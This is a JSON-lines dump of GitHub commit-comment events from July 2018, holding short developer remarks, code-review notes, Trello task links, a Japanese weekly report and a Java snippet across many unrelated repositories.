{"id":"8012895982","type":"CommitCommentEvent","actor":{"login":"KakuFull"},"repo":{"name":"KakuFull/test"},"payload":{"comment":{"id":29820362,"position":null,"line":null,"path":null,"commit_id":"50679930c5e0f2e2bbbceac302bf7b34ee83777d","created_at":"2018-07-24T21:34:17Z","updated_at":"2018-07-24T21:34:17Z","author_association":"OWNER","body":"\r\n・週報\r\n\t記事部分\r\n\t\r\n\t以下の記事について感想を述べます\r\n\t\r\n\tキーボードの代わりに「声」でプログラムを組む「ボイスコーディング」がもたらすものとは？\r\n\thttps://gigazine.net/news/20180705-voice-coding/\r\n\t\r\n\t[概要]\r\n\tキーボードを使わずに、声を使ってコーディングをする「ボイスコーディング」と呼ばれるシステムが存在する。\r\n\t主に障害を負った人や生まれつき体が不自由な人など、キーボードでの入力が困難な層が対象となっている。\r\n\tボイスレコーディングを使用することで障害に悩まされることなくコーディングを行うことができるようになるが、\r\n\tシステムを使用する難易度が高いことが課題となっている。\r\n\t\r\n\t[感想]\r\n\t今回気になった記事は、声を使ってコーディングを行うシステムに関するものでした。\r\n\t記事の紹介動画では、ボイスコーディングを使用してコーディングをする様子が披露されていました。\r\n\t動画ではキーボードを使用することなく記述することができ、とても便利そうに感じました。\r\n\tしかしボイスコーディングは、改行や引用符などの操作やプログラムの関数に対して用語が設定されていて、\r\n\t使いこなすためには多くの専門用語を記憶することが必要になるそうです。\r\n\tそのほかにも、ボイスコーディングの環境によっては用語を読み上げる順番が変わったり、\r\n\t話し方によっては音声認識エンジンが正しく認識しないこともあるそうです。\r\n\t以上のように、使いこなすことが難しいシステムになっています。\t\r\n\t\r\n\t記事を読む前は「発音するだけでコーディングを済ますことが出来て楽そうだな」と思っていましたが、\r\n\t実際は、コーディング内容以外にも改行などの操作も行わないといけないため、\r\n\tキーボードを使う以上に手間がかかると感じました。\r\n\t\r\n\t\r\n・OJT報告書\r\n\t・当月目標\r\n\t\t・SpringMVCの理解、MVCとは、レスポンスの流れについて\r\n\t\t・Seleniumの概要、アーキテクト、画面テストとは何か\r\n\t\t・敬語あたり\r\n\t\t・創作課題の修正\r\n\t\t\t⇒そもやっていない\r\n\t\t・Selenium2系と3系の違いについてまとめる？\r\n\t・当月実績\r\n\t\tそれぞれの項目で何をやったか\r\n\t\t①\r\n\t\t②\r\n\t\t③日報報告を行う際に、敬語に意識して報告を行うようにした。\r\n\t\t④創作課題の発表\r\n\t\r\n\t・自己評価\r\n\t\t成功、失敗、振り返りで①～⑤について記述する\r\n\r\n\r\n"}},"created_at":"2018-07-24T21:34:17Z"}
{"id":"8012896079","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/Node-Express-Lab"},"payload":{"comment":{"id":29820364,"position":null,"line":null,"path":null,"commit_id":"068c08582e8e1580d282e06352013484442b71a4","created_at":"2018-07-24T21:34:18Z","updated_at":"2018-07-24T21:34:18Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Use create-react-app to create an application inside the root folder, name it client.](https://trello.com/c/OKHOCFR2/2-use-create-react-app-to-create-an-application-inside-the-root-folder-name-it-client)"}},"created_at":"2018-07-24T21:34:18Z"}
{"id":"8012896123","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"laps15/phpmyadmin"},"payload":{"comment":{"id":29820365,"position":null,"line":null,"path":null,"commit_id":"a017a8e2c6555d385e2b65cba6560728d20fb5f1","created_at":"2018-07-24T21:34:19Z","updated_at":"2018-07-24T21:34:19Z","author_association":"NONE","body":"<!-- PMABOT:SPACE -->\nThis commit contains trailing whitespace, what is prohibited in phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: templates/table/relation/common_form.twig"}},"created_at":"2018-07-24T21:34:19Z"}
{"id":"8012898467","type":"CommitCommentEvent","actor":{"login":"xji3"},"repo":{"name":"beast-dev/beast-mcmc"},"payload":{"comment":{"id":29820371,"position":null,"line":null,"path":null,"commit_id":"e29fb0f9c991a62889c0a5bc4c8cc8ff5cf00fae","created_at":"2018-07-24T21:34:52Z","updated_at":"2018-07-24T21:34:52Z","author_association":"MEMBER","body":"@msuchard I think I broke the `HyperParameterBranchRateGradient`, will fix it."}},"created_at":"2018-07-24T21:34:52Z"}
{"id":"8012902053","type":"CommitCommentEvent","actor":{"login":"brent-tactec"},"repo":{"name":"brent-tactec/DevOpsVictoria"},"payload":{"comment":{"id":29820375,"position":null,"line":null,"path":null,"commit_id":"92fcc9761ca075145bb864ec3f2278e41c8b1132","created_at":"2018-07-24T21:35:41Z","updated_at":"2018-07-24T21:35:41Z","author_association":"OWNER","body":"meetup prezzie from March2018 added"}},"created_at":"2018-07-24T21:35:41Z"}
{"id":"8012902962","type":"CommitCommentEvent","actor":{"login":"ryantrinkle"},"repo":{"name":"reflex-frp/reflex-platform"},"payload":{"comment":{"id":29820377,"position":null,"line":null,"path":null,"commit_id":"fe0946fc3097e1125a2930a71cdf59b427efd692","created_at":"2018-07-24T21:35:53Z","updated_at":"2018-07-24T21:35:53Z","author_association":"MEMBER","body":"With ghcjs, cabal needed to get --ghcjs-options, not --ghc-options, even though it did not complain about --ghc-options.  It's conceivable that it's expecting --ghc-cross-whatever-options, or something silly like that."}},"created_at":"2018-07-24T21:35:53Z"}
{"id":"8012903705","type":"CommitCommentEvent","actor":{"login":"janosvitok"},"repo":{"name":"mcallegari/qlcplus"},"payload":{"comment":{"id":29820379,"position":null,"line":null,"path":null,"commit_id":"252578b93bf0bfc51cf61a515759fa1dd269ee13","created_at":"2018-07-24T21:36:05Z","updated_at":"2018-07-24T21:36:05Z","author_association":"CONTRIBUTOR","body":"Here you can see examples of how CMY wheels look like:\r\nhttp://gelelighting.blogspot.com/2012/12/rgbrgbw-cmy-in-stage-lights.html\r\nhttps://www.movinglightrepairs.com/products/copy-of-vari-lite-vl2500-magenta-color-wheel-21-9676-0290 (you can see dimmer wheel here as well)."}},"created_at":"2018-07-24T21:36:05Z"}
{"id":"8012908010","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Node-Express-Lab"},"payload":{"comment":{"id":29820389,"position":null,"line":null,"path":null,"commit_id":"94f0daa1ebdb28491b881df6a4620ff8bd239d99","created_at":"2018-07-24T21:37:05Z","updated_at":"2018-07-24T21:37:05Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implement a GET request for a specific ID](https://trello.com/c/Oa5H97cM/4-implement-a-get-request-for-a-specific-id)"}},"created_at":"2018-07-24T21:37:05Z"}
{"id":"8012910552","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Node-Express-Lab"},"payload":{"comment":{"id":29820394,"position":null,"line":null,"path":null,"commit_id":"94f0daa1ebdb28491b881df6a4620ff8bd239d99","created_at":"2018-07-24T21:37:39Z","updated_at":"2018-07-24T21:37:39Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implement a GET request for a specific ID](https://trello.com/c/Oa5H97cM/4-implement-a-get-request-for-a-specific-id)"}},"created_at":"2018-07-24T21:37:39Z"}
{"id":"8012910584","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Node-Express-Lab"},"payload":{"comment":{"id":29820395,"position":null,"line":null,"path":null,"commit_id":"f06bba2f3fa8c719a4f4069870b1bb715a317bb4","created_at":"2018-07-24T21:37:40Z","updated_at":"2018-07-24T21:37:40Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implement a GET request for a specific ID](https://trello.com/c/Oa5H97cM/4-implement-a-get-request-for-a-specific-id)"}},"created_at":"2018-07-24T21:37:40Z"}
{"id":"8012911243","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Node-Express-Lab"},"payload":{"comment":{"id":29820398,"position":null,"line":null,"path":null,"commit_id":"94f0daa1ebdb28491b881df6a4620ff8bd239d99","created_at":"2018-07-24T21:37:49Z","updated_at":"2018-07-24T21:37:49Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implement the GET request](https://trello.com/c/JgZxT2hn/3-implement-the-get-request)"}},"created_at":"2018-07-24T21:37:49Z"}
{"id":"8012911292","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Node-Express-Lab"},"payload":{"comment":{"id":29820399,"position":null,"line":null,"path":null,"commit_id":"f06bba2f3fa8c719a4f4069870b1bb715a317bb4","created_at":"2018-07-24T21:37:50Z","updated_at":"2018-07-24T21:37:50Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implement the GET request](https://trello.com/c/JgZxT2hn/3-implement-the-get-request)"}},"created_at":"2018-07-24T21:37:50Z"}
{"id":"8012915687","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Node-Express-Lab"},"payload":{"comment":{"id":29820404,"position":null,"line":null,"path":null,"commit_id":"46a13c9846bb2eae8b6069ed9b3f14bfc5228e89","created_at":"2018-07-24T21:38:49Z","updated_at":"2018-07-24T21:38:49Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implement a Post request](https://trello.com/c/HkVxOB0U/5-implement-a-post-request)"}},"created_at":"2018-07-24T21:38:49Z"}
{"id":"8012915710","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Node-Express-Lab"},"payload":{"comment":{"id":29820405,"position":null,"line":null,"path":null,"commit_id":"5b3351d0b99937badf4801bef4a19ed01da77a7c","created_at":"2018-07-24T21:38:50Z","updated_at":"2018-07-24T21:38:50Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implement a Post request](https://trello.com/c/HkVxOB0U/5-implement-a-post-request)"}},"created_at":"2018-07-24T21:38:50Z"}
{"id":"8012917108","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Node-Express-Lab"},"payload":{"comment":{"id":29820409,"position":null,"line":null,"path":null,"commit_id":"18528b5e8b48dfaa358c2a9971481548770fbb38","created_at":"2018-07-24T21:39:09Z","updated_at":"2018-07-24T21:39:09Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implement a Delete request](https://trello.com/c/Xxw7uWBj/6-implement-a-delete-request)"}},"created_at":"2018-07-24T21:39:09Z"}
{"id":"8012917594","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Node-Express-Lab"},"payload":{"comment":{"id":29820411,"position":null,"line":null,"path":null,"commit_id":"6163cf6fd7e8664b0e06bcd65ba41cf45c28331d","created_at":"2018-07-24T21:39:16Z","updated_at":"2018-07-24T21:39:16Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implement a Put request](https://trello.com/c/GpqXlSRA/7-implement-a-put-request)"}},"created_at":"2018-07-24T21:39:16Z"}
{"id":"8012918886","type":"CommitCommentEvent","actor":{"login":"yetinglong"},"repo":{"name":"c-rainstorm/blog"},"payload":{"comment":{"id":29820414,"position":null,"line":null,"path":null,"commit_id":"8d7476fdc46acab606be4b72cb1a5a82985a98b4","created_at":"2018-07-24T21:39:34Z","updated_at":"2018-07-24T21:39:34Z","author_association":"NONE","body":"compare"}},"created_at":"2018-07-24T21:39:34Z"}
{"id":"8012919703","type":"CommitCommentEvent","actor":{"login":"mickski56"},"repo":{"name":"mickski56/RetroArch"},"payload":{"comment":{"id":29820415,"position":null,"line":null,"path":null,"commit_id":"700b2398328fc923e0a9005a70002ce8ae0c07b6","created_at":"2018-07-24T21:39:46Z","updated_at":"2018-07-24T21:39:46Z","author_association":"OWNER","body":"address (Input) Proper analog trigger support #6920"}},"created_at":"2018-07-24T21:39:46Z"}
{"id":"8012923147","type":"CommitCommentEvent","actor":{"login":"dagochen"},"repo":{"name":"MrSon1Q/university"},"payload":{"comment":{"id":29820424,"position":17,"line":17,"path":"ТПО/Stroganov/Lab first/FirstPart.java","commit_id":"09ece701fb547bae27cefdbf9725918198cecf90","created_at":"2018-07-24T21:40:32Z","updated_at":"2018-07-24T21:40:32Z","author_association":"NONE","body":"Hey,\r\n\r\nin line 17 you dont need \"? true : false;\r\ncheckArgs = (args[0].equals(\"-i\") && !args[1].equals(\"\"))"}},"created_at":"2018-07-24T21:40:32Z"}
{"id":"8012929581","type":"CommitCommentEvent","actor":{"login":"CoffeeOwl97"},"repo":{"name":"HaCSBCU/hacsbcu.github.io"},"payload":{"comment":{"id":29820441,"position":null,"line":null,"path":null,"commit_id":"3c415e5fb01ddf64dcad5a0ffed918481d4c93c3","created_at":"2018-07-24T21:42:00Z","updated_at":"2018-07-24T21:42:00Z","author_association":"MEMBER","body":"Just realised that we already appear to have this for 1.0 site? not why its failing security checks."}},"created_at":"2018-07-24T21:42:00Z"}
{"id":"8012933681","type":"CommitCommentEvent","actor":{"login":"strassek"},"repo":{"name":"intel/external-mesa"},"payload":{"comment":{"id":29820457,"position":null,"line":null,"path":null,"commit_id":"80ce8b3f26ec09818472c926360bc82970becc6d","created_at":"2018-07-24T21:42:56Z","updated_at":"2018-07-24T21:42:56Z","author_association":"CONTRIBUTOR","body":"This patch was submitted to upstream mailing list: https://patchwork.freedesktop.org/patch/219056/"}},"created_at":"2018-07-24T21:42:56Z"}
{"id":"8012936805","type":"CommitCommentEvent","actor":{"login":"RandyCalderon"},"repo":{"name":"RandyCalderon/Node-Express-Lab"},"payload":{"comment":{"id":29820466,"position":null,"line":null,"path":null,"commit_id":"ff317838880baff5d37927138d4ef02d7589da45","created_at":"2018-07-24T21:43:38Z","updated_at":"2018-07-24T21:43:38Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [When the client makes a GET request to /api/posts:](https://trello.com/c/kaTtidTi/2-when-the-client-makes-a-get-request-to-api-posts)"}},"created_at":"2018-07-24T21:43:38Z"}
{"id":"8012940059","type":"CommitCommentEvent","actor":{"login":"AugsEU"},"repo":{"name":"AugsEU/BlenderCOL"},"payload":{"comment":{"id":29820471,"position":null,"line":null,"path":null,"commit_id":"309370643f5e951f0899e8372e88c7bae3d8fafd","created_at":"2018-07-24T21:44:23Z","updated_at":"2018-07-24T21:44:23Z","author_association":"OWNER","body":"dodgy hey!"}},"created_at":"2018-07-24T21:44:23Z"}
{"id":"8012941372","type":"CommitCommentEvent","actor":{"login":"Doe-Jon"},"repo":{"name":"minglich/logitech-pubg"},"payload":{"comment":{"id":29820474,"position":null,"line":null,"path":null,"commit_id":"31e652dbd25ffe42c71191fd44cff07216c41b72","created_at":"2018-07-24T21:44:42Z","updated_at":"2018-07-24T21:44:42Z","author_association":"NONE","body":"I cannot get the auto reload to work. Is there a step or a trick to it?  I have set to true in script.\r\nPlease help."}},"created_at":"2018-07-24T21:44:42Z"}
{"id":"8012943278","type":"CommitCommentEvent","actor":{"login":"LordLukin"},"repo":{"name":"PiotrKoter/Students"},"payload":{"comment":{"id":29820484,"position":14,"line":23,"path":"Student.cpp","commit_id":"7b3b90aef5face31df58b78c52a422abe5357427","created_at":"2018-07-24T21:45:09Z","updated_at":"2018-07-24T21:45:09Z","author_association":"NONE","body":"getSrednia - słabo to brzmi. Połowa po angielsku, połowa po polsku :)"}},"created_at":"2018-07-24T21:45:09Z"}
{"id":"8012944179","type":"CommitCommentEvent","actor":{"login":"sgdc3"},"repo":{"name":"CodeMC/HolographicDisplays"},"payload":{"comment":{"id":29820492,"position":null,"line":null,"path":null,"commit_id":"3a5aa2da3469fedf611e786694e0ca7a76847fef","created_at":"2018-07-24T21:45:20Z","updated_at":"2018-07-24T21:45:20Z","author_association":"MEMBER","body":"@mibby 1) i'll try on my server 2) they are using classes that are outside of the HD api, that's a bad design choice, i didn't touch the api at all to keep compatibility with other plugins."}},"created_at":"2018-07-24T21:45:20Z"}
{"id":"8012948710","type":"CommitCommentEvent","actor":{"login":"LordLukin"},"repo":{"name":"PiotrKoter/Students"},"payload":{"comment":{"id":29820505,"position":9,"line":6,"path":"Student.cpp","commit_id":"feb3515f7976062e14a0a810bc6d1af1726ba7e8","created_at":"2018-07-24T21:46:21Z","updated_at":"2018-07-24T21:46:21Z","author_association":"NONE","body":"Po co konstruktor domyślny dla klasy Student? Nie powinno być opcji stworzenia studenta bez imienia, nazwiska, indeksu i średniej."}},"created_at":"2018-07-24T21:46:21Z"}
{"id":"8012951265","type":"CommitCommentEvent","actor":{"login":"ignasbernotas"},"repo":{"name":"MysteriumNetwork/mysterion"},"payload":{"comment":{"id":29820511,"position":22,"line":91,"path":"src/main/dependencies/modules/mysterium-client.js","commit_id":"efc6bd10d1ced773118d70c6e52fc1c869d8ba32","created_at":"2018-07-24T21:46:58Z","updated_at":"2018-07-24T21:46:58Z","author_association":"MEMBER","body":"process log subscriber"}},"created_at":"2018-07-24T21:46:58Z"}
{"id":"8012951576","type":"CommitCommentEvent","actor":{"login":"LordLukin"},"repo":{"name":"PiotrKoter/Students"},"payload":{"comment":{"id":29820514,"position":10,"line":10,"path":"Student.hpp","commit_id":"feb3515f7976062e14a0a810bc6d1af1726ba7e8","created_at":"2018-07-24T21:47:02Z","updated_at":"2018-07-24T21:47:02Z","author_association":"NONE","body":"Język polski się wkrada."}},"created_at":"2018-07-24T21:47:02Z"}
{"id":"8012953016","type":"CommitCommentEvent","actor":{"login":"janosvitok"},"repo":{"name":"mcallegari/qlcplus"},"payload":{"comment":{"id":29820521,"position":null,"line":null,"path":null,"commit_id":"252578b93bf0bfc51cf61a515759fa1dd269ee13","created_at":"2018-07-24T21:47:22Z","updated_at":"2018-07-24T21:47:22Z","author_association":"CONTRIBUTOR","body":"In other words:\r\ntype 1. is more or less a white bulb, some lens and some color glasses in front of the bulb. The complication comes from the fact that we want to remotely add/remove these glasses and vary their opacity.\r\n\r\nIf you put yellow foil before a bulb, you see orange light, because yellow filter only passes yellow light (R+G).\r\nIf you add blue foil, there will be no light. If you add green to yellow, you'll get green light (probably a bit darker that the green foil alone).\r\n\r\nWhite filter = transparent. The light is already white. White = contains all colors.\r\n\r\nhttp://www.leefilters.com/lighting/colour-details.html#048&filter=cf contains chart for each gel how much light it allows to pass.\r\n\r\ntype 2. is RGB LEDs and some processing in the driver."}},"created_at":"2018-07-24T21:47:22Z"}
{"id":"8012956008","type":"CommitCommentEvent","actor":{"login":"ignasbernotas"},"repo":{"name":"MysteriumNetwork/mysterion"},"payload":{"comment":{"id":29820527,"position":25,"line":25,"path":"src/libraries/mysterium-client/client-log-subscriber.js","commit_id":"efc6bd10d1ced773118d70c6e52fc1c869d8ba32","created_at":"2018-07-24T21:48:05Z","updated_at":"2018-07-24T21:48:05Z","author_association":"MEMBER","body":"date -> dateFunction"}},"created_at":"2018-07-24T21:48:05Z"}
{"id":"8012956553","type":"CommitCommentEvent","actor":{"login":"LordLukin"},"repo":{"name":"PiotrKoter/Students"},"payload":{"comment":{"id":29820529,"position":10,"line":10,"path":"Employee.cpp","commit_id":"9ec31fd1889c9caaed10091924731823aaddc7fc","created_at":"2018-07-24T21:48:13Z","updated_at":"2018-07-24T21:48:13Z","author_association":"NONE","body":"Bardzo podobne te settery i gettery jak w klasie Student. Może by tak uniknąć duplikacji? :)"}},"created_at":"2018-07-24T21:48:13Z"}
{"id":"8012958358","type":"CommitCommentEvent","actor":{"login":"DaBingg"},"repo":{"name":"minglich/logitech-pubg"},"payload":{"comment":{"id":29820531,"position":null,"line":null,"path":null,"commit_id":"31e652dbd25ffe42c71191fd44cff07216c41b72","created_at":"2018-07-24T21:48:39Z","updated_at":"2018-07-24T21:48:39Z","author_association":"NONE","body":"@minglich 你好\r\n\r\n    我阅读了你的代码, 并且证实了它的效果. 它的效果非常棒, 我有一个问题，好像自动步枪的数据只有15个，因为我发现超过20颗子弹后（大概是20），就会过度下压瞄准，请问你知道如何获得后面的数据吗？我不能从PAK文件中提取到这个数据，如果你已经提取到武器数据，可以分享给我吗，或者你可以帮助我吗？\r\n\r\n非常感谢你的贡献"}},"created_at":"2018-07-24T21:48:39Z"}
{"id":"8012962964","type":"CommitCommentEvent","actor":{"login":"wasupman2"},"repo":{"name":"osTicket/osTicket"},"payload":{"comment":{"id":29820545,"position":null,"line":null,"path":null,"commit_id":"424bfc99d93b920f6162b602eeea41125086425d","created_at":"2018-07-24T21:49:46Z","updated_at":"2018-07-24T21:49:46Z","author_association":"NONE","body":"This fix works on IIS7, PHP 7.1.7, osTicket 1.10.4"}},"created_at":"2018-07-24T21:49:46Z"}
{"id":"8012965878","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29820551,"position":8,"line":21,"path":"Lesson2/number_month_year.rb","commit_id":"a9d020183d4417d9d0f26a6a0d4784f8a112ae7f","created_at":"2018-07-24T21:50:25Z","updated_at":"2018-07-24T21:50:25Z","author_association":"NONE","body":"строки с 20 по 24 можно заменить на\r\n```\r\nmonth.first(month - 1).sum(day)\r\n```\r\nберем все месяцы До текущего.\r\nметод sum опционально принимает аргумент, который будет начальным значением. И складываем весь массив с этим начальным значением."}},"created_at":"2018-07-24T21:50:25Z"}
{"id":"8012967909","type":"CommitCommentEvent","actor":{"login":"dKeith40"},"repo":{"name":"dKeith40/hello-world"},"payload":{"comment":{"id":29820555,"position":null,"line":null,"path":null,"commit_id":"11237954e00bc0b7acac829246497a31167988b9","created_at":"2018-07-24T21:50:53Z","updated_at":"2018-07-24T21:50:53Z","author_association":"OWNER","body":"updated"}},"created_at":"2018-07-24T21:50:53Z"}
{"id":"8012970515","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29820559,"position":28,"line":32,"path":"Lesson2/sum_for_purchases.rb","commit_id":"a9d020183d4417d9d0f26a6a0d4784f8a112ae7f","created_at":"2018-07-24T21:51:32Z","updated_at":"2018-07-24T21:51:32Z","author_association":"NONE","body":"Между details и [:quantity] не должно быть пробела"}},"created_at":"2018-07-24T21:51:32Z"}
{"id":"8012970912","type":"CommitCommentEvent","actor":{"login":"alexax66"},"repo":{"name":"danwood76/android_kernel_samsung_exynos7580-common"},"payload":{"comment":{"id":29820561,"position":null,"line":null,"path":null,"commit_id":"83e2e8199f08bc4fb0cd9cb7d000680524a4bbde","created_at":"2018-07-24T21:51:37Z","updated_at":"2018-07-24T21:51:37Z","author_association":"NONE","body":"Hi\r\nInteractive governor has big bug: locking 800Mhz CPU freq while asleep.\r\nI tried fix it, but unsuccessfully\r\nThere is another way.\r\nStock ROM used DVFS for control CPU freq (see two params in /sys/power/):\r\n* cpufreq_max_limit to setup max cpu freq for all CPU cores\r\n* cpufreq_max_limit to setup min cpu freq for all CPU cores\r\nWe can use thes via custom Power HAL and set different  min/max freq while screen on/off \r\nExample  how we may make it:  https://github.com/TeamNexus/android_device_samsung_zero-common/blob/nx-8.1/hardware/power/Power.cpp#L287\r\n\r\n"}},"created_at":"2018-07-24T21:51:37Z"}
{"id":"8012971437","type":"CommitCommentEvent","actor":{"login":"cryptojerm777"},"repo":{"name":"holochain/holochain-proto"},"payload":{"comment":{"id":29820564,"position":null,"line":null,"path":null,"commit_id":"c718a314eef73e23867902fb19da9ede8027193c","created_at":"2018-07-24T21:51:44Z","updated_at":"2018-07-24T21:51:44Z","author_association":"NONE","body":"thank you"}},"created_at":"2018-07-24T21:51:44Z"}
{"id":"8012972141","type":"CommitCommentEvent","actor":{"login":"anule"},"repo":{"name":"anule/who-or-them"},"payload":{"comment":{"id":29820567,"position":null,"line":null,"path":null,"commit_id":"8d56dc9ba09f4f765a18e50c85888787647db574","created_at":"2018-07-24T21:51:55Z","updated_at":"2018-07-24T21:51:55Z","author_association":"OWNER","body":"Closes Issue #6 "}},"created_at":"2018-07-24T21:51:55Z"}
{"id":"8012973857","type":"CommitCommentEvent","actor":{"login":"kinerity"},"repo":{"name":"kinerity/trackers"},"payload":{"comment":{"id":29820570,"position":null,"line":null,"path":null,"commit_id":"069b86f727aca77068aa0eb2f7e379351646d27e","created_at":"2018-07-24T21:52:19Z","updated_at":"2018-07-24T21:52:19Z","author_association":"OWNER","body":"There are no options yet. This is not ready for use in production."}},"created_at":"2018-07-24T21:52:19Z"}
{"id":"8012977851","type":"CommitCommentEvent","actor":{"login":"Stratus3D"},"repo":{"name":"asdf-vm/asdf-erlang"},"payload":{"comment":{"id":29820575,"position":null,"line":null,"path":null,"commit_id":"716d94174956ccbb0f771febe87e02c8df09ba56","created_at":"2018-07-24T21:53:17Z","updated_at":"2018-07-24T21:53:17Z","author_association":"CONTRIBUTOR","body":"I think I was completely wrong about the environment variables we need to set for install docs. I think we need to use `KERL_INSTALL_MANPAGES` and `KERL_INSTALL_HTMLDOCS` instead of `KERL_BUILD_DOCS`. We don't need to build docs ourselves, we just want them installed. the `KERL_INSTALL_*` flags work for regular releases. The only time they don't work is when building from Git source.\r\n\r\nhttps://github.com/kerl/kerl#manpages-installation"}},"created_at":"2018-07-24T21:53:17Z"}
{"id":"8012978713","type":"CommitCommentEvent","actor":{"login":"RandyCalderon"},"repo":{"name":"RandyCalderon/Node-Express-Lab"},"payload":{"comment":{"id":29820577,"position":null,"line":null,"path":null,"commit_id":"4433abefad08d9bf7f30d5862a8a16b5b8fa275f","created_at":"2018-07-24T21:53:28Z","updated_at":"2018-07-24T21:53:28Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [When the client makes a POST request to /api/posts:](https://trello.com/c/ip9nPhut/1-when-the-client-makes-a-post-request-to-api-posts)"}},"created_at":"2018-07-24T21:53:28Z"}
{"id":"8012979388","type":"CommitCommentEvent","actor":{"login":"salexpdx"},"repo":{"name":"salexpdx/og-aws"},"payload":{"comment":{"id":29820579,"position":null,"line":null,"path":null,"commit_id":"5d65fa431ac56a301db26a955a1cc78b077d6507","created_at":"2018-07-24T21:53:38Z","updated_at":"2018-07-24T21:53:38Z","author_association":"OWNER","body":"I'll see about getting an update to it wrapped up tonight to clarify it\r\n"}},"created_at":"2018-07-24T21:53:38Z"}
{"id":"8012980259","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29820581,"position":32,"line":35,"path":"Lesson2/sum_for_purchases.rb","commit_id":"a9d020183d4417d9d0f26a6a0d4784f8a112ae7f","created_at":"2018-07-24T21:53:50Z","updated_at":"2018-07-24T21:53:50Z","author_association":"NONE","body":"сумма покупки? Сам себя запутал. Это цена покупки - price"}},"created_at":"2018-07-24T21:53:50Z"}
{"id":"8012980760","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/Node-Express-Lab"},"payload":{"comment":{"id":29820584,"position":null,"line":null,"path":null,"commit_id":"8f259bc3155c0f13d06739aaa120ab0264fd10a9","created_at":"2018-07-24T21:53:58Z","updated_at":"2018-07-24T21:53:58Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [From the React application connect to the /api/posts endpoint in the API and show the list of posts.](https://trello.com/c/hV4nWzpU/3-from-the-react-application-connect-to-the-api-posts-endpoint-in-the-api-and-show-the-list-of-posts)"}},"created_at":"2018-07-24T21:53:58Z"}
{"id":"8012981697","type":"CommitCommentEvent","actor":{"login":"Stratus3D"},"repo":{"name":"asdf-vm/asdf-erlang"},"payload":{"comment":{"id":29820586,"position":null,"line":null,"path":null,"commit_id":"716d94174956ccbb0f771febe87e02c8df09ba56","created_at":"2018-07-24T21:54:11Z","updated_at":"2018-07-24T21:54:11Z","author_association":"CONTRIBUTOR","body":"If we do need to write code ourselves to get this to work that code should be added to kerl and not asdf-erlang."}},"created_at":"2018-07-24T21:54:11Z"}
{"id":"8012984101","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29820589,"position":32,"line":35,"path":"Lesson2/sum_for_purchases.rb","commit_id":"a9d020183d4417d9d0f26a6a0d4784f8a112ae7f","created_at":"2018-07-24T21:54:46Z","updated_at":"2018-07-24T21:54:46Z","author_association":"NONE","body":"И внутри обращения к ключу хэша лучше сделать символ, а не строку."}},"created_at":"2018-07-24T21:54:46Z"}
{"id":"8012984199","type":"CommitCommentEvent","actor":{"login":"mweirauch"},"repo":{"name":"micrometer-metrics/micrometer"},"payload":{"comment":{"id":29820590,"position":4,"line":66,"path":"micrometer-core/src/main/java/io/micrometer/core/instrument/binder/system/UptimeMetrics.java","commit_id":"5632cd4b9b534cb192791f6021ddd6f811cf34c0","created_at":"2018-07-24T21:54:48Z","updated_at":"2018-07-24T21:54:48Z","author_association":"COLLABORATOR","body":"Something we could incorporate:\r\n\r\n```java\r\n    @Bean\r\n    MeterFilter pushgatewayCompatMeterFilter() {\r\n        return new MeterFilter() {\r\n\r\n            @Override\r\n            public Id map(Id id) {\r\n                if (!\"process.start.time\".equals(id.getName())) {\r\n                    return id;\r\n                }\r\n                /*\r\n                 * Starting with prom/pushgateway:v0.5.0 differing meter\r\n                 * descriptions are not accepted anymore. Pushgateway is\r\n                 * exposing its own \"process_start_time_seconds\" metric which\r\n                 * has a differing description than the one from Micrometer.\r\n                 */\r\n                return new Id(id.getName(), id.getTags(), id.getBaseUnit(),\r\n                        \"Start time of the process since unix epoch in seconds.\", id.getType());\r\n            }\r\n\r\n        };\r\n    }\r\n```"}},"created_at":"2018-07-24T21:54:48Z"}
